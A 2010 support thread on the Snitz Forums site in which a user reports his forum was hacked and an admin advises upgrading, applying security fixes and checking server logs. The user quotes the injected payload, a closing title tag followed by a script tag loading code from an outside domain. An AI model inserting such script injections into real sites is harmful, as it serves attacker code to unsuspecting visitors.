Snitz Forums 2000
Snitz Forums 2000
Home | Profile | Register | Active Topics | Members | Search | FAQ
Username:
 Password:
Save Password
Forgot your Password?

 All Forums
 Community Forums
 Community Discussions (All other subjects)
 My Forum was Hacked		  New Topic  Reply to Topic
 Printer Friendly
Author Previous Topic Topic Next Topic  

bendecko
Starting Member

5 Posts
Posted - 01 October 2010 :  08:21:18  Show Profile  Visit bendecko's Homepage  Reply with Quote
Hi

http://www.thegamersguild.co.uk/forum/

</title><script src=http://google-stats49.info/ur.php></script> seems to be what they entered.

You can see this on the Title of General forum.

I was under the impression Snitz was not vunerable to SQL injection?

What can I do to clean this up?

What can I do to prevent it happening.

Thanks

Ben

ruirib
Snitz Forums Admin

Portugal
26364 Posts
Posted - 01 October 2010 :  09:39:51  Show Profile  Send ruirib a Yahoo! Message  Reply with Quote
You cannot make any assumptions unless you are running our latest version, with the latest security fixes applied. The current version with all the fixes applied (I would almost risk saying the downloadable version has the security fixes applied, but I can't say it with complete certainty) has no known vulnerabilities. In the current day and age that's all we can guarantee.

I would say that if you don't have mods, just upgrade to the latest version and check if the most recent security fixes are applied. If you have mods and don't want to apply them again, I suggest that you apply all the security fixes that are applicable to your forum version (3.4.06).

You can also have a look at the server logs, to find out how they did hacked the forum. Should be rather easy to do that, if you have access to the server logs.

Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

bendecko
Starting Member

5 Posts
Posted - 08 October 2010 :  06:13:02  Show Profile  Visit bendecko's Homepage  Reply with Quote
OK I upgraded to the lastest version.

What about security fixeds for the latest version?

E.g. http://forum.snitz.com/forum/topic.asp?TOPIC_ID=69117

Have these been added to the download or need I do these manually?
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts
Posted - 08 October 2010 :  07:01:36  Show Profile  Send ruirib a Yahoo! Message  Reply with Quote
Unfortunately I cannot be sure they are included. If someone else can shed any light on that, please do.

It is, however, easy to check if they are in the code. Just have a look at how the code should look after the fixes (each fix provides information about that) and confirm that the fixes are in the downloaded code. If they are not, then add them.

I will perform this check later, as I can't do it where I am now.

Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page
  Previous Topic Topic Next Topic  
 New Topic  Reply to Topic
 Printer Friendly
Jump To:
Snitz Forums 2000 © 2000-2021 Snitz™ Communications Go To Top Of Page
This page was generated in 0.23 seconds. Powered By: Snitz Forums 2000 Version 3.4.07